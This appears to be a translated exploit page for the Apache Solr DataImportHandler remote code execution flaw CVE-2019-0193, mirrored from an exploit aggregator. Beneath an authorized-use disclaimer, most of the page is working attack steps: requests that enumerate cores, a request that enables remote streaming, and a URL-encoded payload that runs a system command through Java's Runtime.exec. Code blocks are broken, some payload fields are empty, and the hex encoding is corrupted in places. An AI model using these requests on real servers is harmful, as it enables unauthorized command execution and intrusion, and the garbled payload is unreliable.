## https://sploitus.com/exploit?id=7079E7AF-2008-53D1-B341-626DD01FC788
### Declaration
The vulnerability detection methods, documentation, and other content provided herein are limited to use by security practitioners under legal authorization for the purpose of testing the security of authorized servers. Security practitioners must comply with legal requirements and are prohibited from doing any vulnerability testing without authorization.
### Introduction
[Vulnerability Analysis - Apache Solr Remote Code Execution Vulnerability (CVE-2019-0193) - Prophet Community](https://xz.aliyun.com/t/5965)
Exploit can theoretically be constructed using a variety of different types of data sources
Exploit1 uses a datasource of type `URLDataSource`
Exploit2 uses a data source of type `ContentStreamDataSource`
### Detecting vulnerabilities - Exploit1
Exploit1 uses a data source of type `URLDataSource`.
Advantages: results back Support for detection of low versions of Solr
Disadvantages: requires out-of-network
#### Step 1
Construct a data source of type `URLDataSource` (which the Solr server will go to!). You can use this directly
https://raw.githubusercontent.com/1135/solr_exploit/master/URLDataSource/demo.xml
Document `demo.xml` i.e. `URLDataSource` type datasource A harmless normal XML document.
There is only one `item` element in the document so that only one command is executed.
You can also start your own web server to host the document `demo.xml` with the command `live-server --port=5555` to get the address `http://127.0.0.1:5555/demo.xml`.
#### Step 2
Get the names of all indexed cores in Solr.
```
http://{xx.com:80}/solr/admin/cores
HTTP response JSON data will have the names of all indexed cores.
"name": "xxxx"
```
#### Step 3
Determine if the indexed library is using the DataImportHandler module
Method 1
``
Access
http://{xx.com:80}/solr/{core_name}/admin/mbeans?cat=QUERY&wt=json
If the DataImportHandler module is used, the HTTP response will contain.
org.apache.solr.handler.dataimport.DataImportHandler
Otherwise, the DataImportHandler module is not used (and is not affected by this vulnerability).
``
Method 2
``
Visit
http://{xx.com:80}/solr/#/{core_name}/dataimport
If this Solr server does not use the dataimport-handler module (which is not affected by this vulnerability), the HTTP response will indicate:
sorry, no dataimport-handler defined!
Otherwise, the DataImportHandler module (which is not affected by this vulnerability) is used.
``
#### Step 4 Constructing the HTTP request
Execute commands HTTP response has execution result display back Multi-line result supported (I wrote each line ending with `\n\r`)
Note: You need to replace the string "tika" in the following request url with the name of the indexing library.
```
POST /solr/tika/dataimport HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 1231
Connection: close
command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig=
``
### Detecting vulnerabilities - Exploit2
Exploit2 uses a data source of type ``ContentStreamDataSource``.
Advantages: Results are displayed without going offline.
Disadvantage:Undetectable for lower versions - because modifying the configuration in the `configoverlay.json` file via a POST request will fail
#### Steps 1-3
Step 1 omitted
Steps 2-3 Same as above
#### Step 4
This step is to modify the configuration in the `configoverlay.json` file to enable the remote streaming options `.enableStreamBody` `.enableRemoteStreaming`.
Replace `tika` with the index library name
```
POST /solr/tika/config HTTP/1.1
Host: 127.0.0.1
Accept: */*
Content-type:application/json
Content-Length: 159
Connection: close
{"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": true}, "set-property": {"requestDispatcher.requestParsers. enableStreamBody": true}}
``
Response 200 is successful (real test 8.1 can be successful)
Responding with 500 fails (in practice, some lower versions will fail).
#### Step 5
Send a request to execute the system command `ifconfig` and get a message back (no outgoing connection, no network outage).
POST /solr/tika/dataimport?command=full-import
POST /solr/tika/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport& dataConfig=%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%73 72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%65 76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%20%6a%61%76%61%61%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%20 6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%6e 65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78 65%63%28%22%69%66%63%6f%6e%66%69%67%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73 75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52 65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%69%3d%20%62%75%66%52%6e 66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c% 74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70 74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22 75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45 6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24%72%61%6e%73%66%6f%72%6d%65%72%3d%22%74%74%69%74%79%3d%22%74%72%75%65%22%0a%20 6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%64%6c%65%22%20%2f%3e%0a%20%20%20%20%20%20%3c%2f%3c 65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%20%0a%20%20%20%20%20%20%20%20 20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20 HTTP/1.1
Host: solr.com:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://solr.com:8983/solr/
Content-Length: 212
content-type: multipart/form-data; boundary=------------------------aceb88c2159f183f
--------------------------aceb88c2159f183f
Content-Disposition: form-data; name="stream.body"
--------------------------aceb88c2159f183f--
``
Note that the value of dataConfig, before URLencode, is the following string
```
``